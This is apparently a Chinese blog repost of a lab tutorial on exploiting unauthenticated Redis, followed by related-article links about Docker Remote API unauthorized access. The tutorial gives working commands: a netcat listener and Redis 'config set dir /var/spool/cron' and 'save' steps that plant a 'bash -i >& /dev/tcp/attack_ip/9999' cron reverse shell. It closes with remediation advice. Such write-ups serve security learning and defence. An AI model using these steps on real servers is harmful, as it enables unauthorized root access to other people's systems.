docker remote api未授权访问_Redis未授权访问漏洞利用

最新推荐文章于 2024-05-14 08:00:00 发布
最新推荐文章于 2024-05-14 08:00:00 发布
阅读量134 收藏
点赞数
文章标签: docker remote api未授权访问

漏洞简介及危害

Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。

漏洞利用

环境搭建

# redis安装
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar -xvzf redis-3.2.0.tar.gz

观察到如下输出,漏洞环境搭建成功

d814a0212759b14a6d3422ce7ef47d83.png

反弹shell

# 在攻击主机上打开9999端口监听
[root@]# nc -vv -l -p 9999

未授权访问验证

# 连接靶机redis
redis -h target_ip

# 获取redis版本等信息
target_ip> info

c19ed830506772cf9ea4c024ec998f76.png

写入shell

# 设置变量
target_ip:6379> set xx "n* * * * * bash -i >& /dev/tcp/attack_ip/9999 0>&1n"
OK

# 修改redis默认目录和rdb文件
target_ip:6379> config set dir /var/spool/cron
OK
target_ip:6379> config set dbfilename root
OK
target_ip:6379> save
OK

成功反弹宿主机shell

b8a4dfe06c873e55faf8079e702c5658.png
P.S ,测试完记得关闭存在漏洞的redis

修复建议

方法一: 可以修改绑定的IP、端口和指定访问者IP 具体根据实际情况来设定,也可以直接在服务器防火墙上做设置。

方法二: 设置访问密码 在 redis.conf 中找到“requirepass”字段,取消注释并在后面填上你需要的密码。 注:修改redis的配置需要重启redis才能生效。

Redis未授权访问漏洞利用 - Tachiu Lam​tclam.cn
a3cc044c39240cda8fca7c067c48408b.png
weixin_39569112
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Docker Remote API 授权漏洞全球探测1
08-03
漏洞发现的起因是,有一位同学在使用 docker swarm 的时候,发现了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
授权访问Docker授权访问漏洞
最新发布
qq_68163788的博客
05-14 2124
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
关于docker remote api授权访问漏洞的学习与研究
07-16 621
漏洞介绍: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker授权访问漏洞(www.hetianlab.com)
懂进攻知防守
07-20 3253
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。Docker Daemon把服务暴露在tcp的2375端口上,这样就可以在网络上操作Docker了。Docker本身没有身份认证的功能,只要网络上能访问到服务端口,就可以操作Docker。...
redis指定配置文件启动不生效_Redis主从复制 哨兵服务
weixin_33918358的博客
12-19 734
步骤一:将主机192.168.4.51配置为主服务器1) 每台redis服务器,默认都是主服务器;所以主服务器不需要配置。[root@redisA ~]# redis-cli -h 192.168.4.51 –p 6351 192.168.4.51:6351> info replication //查看复制信息# Replicationrole:master ...
Emqx5.0-认证授权
m0_46364414的博客
04-23 724
permission默认值为:allow。action默认值为:all。
Redis集群Docker化v1.0.docx_redis集群docker化_Docker_节点部署_
10-02
Redis集群Docker化部署文档,1、基础集群构建,2、制作redis节点镜像3、运行redis集群
基于Docker的MongoDB实现授权访问方法
09-09
主要介绍了基于Docker的MongoDB实现授权访问方法,需要的朋友可以参考下
完美解决linux上启动redis后配置文件生效的问题
12-16
redis.conf后,重启redis,发现修的配置生效,原来是需要在启动redis的时候在命令中加上配置文件,命令如下 ./redis-server /usr/local/redis-3.2.8/redis.conf & 仔细阅读配置文件可以开头看到有这样的描述 # Note that in order to read the configuration file, Redis must be # started with the file path as first argument: # # ./redis-server /path/to/redis.conf 所以问题就在这
Docker授权访问漏洞
qq_50854662的博客
10-18 1376
Docker授权访问漏洞
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2277
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
配置开启Docker2375远程连接与解决Docker授权访问漏洞
Sherry
11-13 4999
配置开启Docker2375远程连接与解决Docker授权访问漏洞。
docker授权rce+docker逃逸复现
weixin_54227009的博客
05-22 1336
这段时间跟着bnessy师傅一起打内网,跟着bnessy师傅也学到了很多有用的姿势,这里就来复现几个内网的漏洞(大佬轻喷)
漏洞复现 - - -Docker授权访问漏洞
weixin_67503304的博客
08-16 4932
Docker授权访问漏洞,docker授权写定时任务获取shell,详细概述了通过docker获取shell的方法
docker api授权导致rce 漏洞修复
core815的专栏
05-26 1669
docker api授权导致rce 漏洞修复
Docker API 授权访问漏洞
qq_42383069的博客
05-09 7809
Docker API 授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
Docker Remote API 漏洞分析:无授权访问风险
"Docker Remote API 授权漏洞全球探测1" Docker 是一个广泛应用的开源容器引擎,它采用Go语言编写,并遵循Apache 2.0许可证。Docker的主要功能是允许开发者将应用程序及其依赖打包到轻量级、可移植的容器中,这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值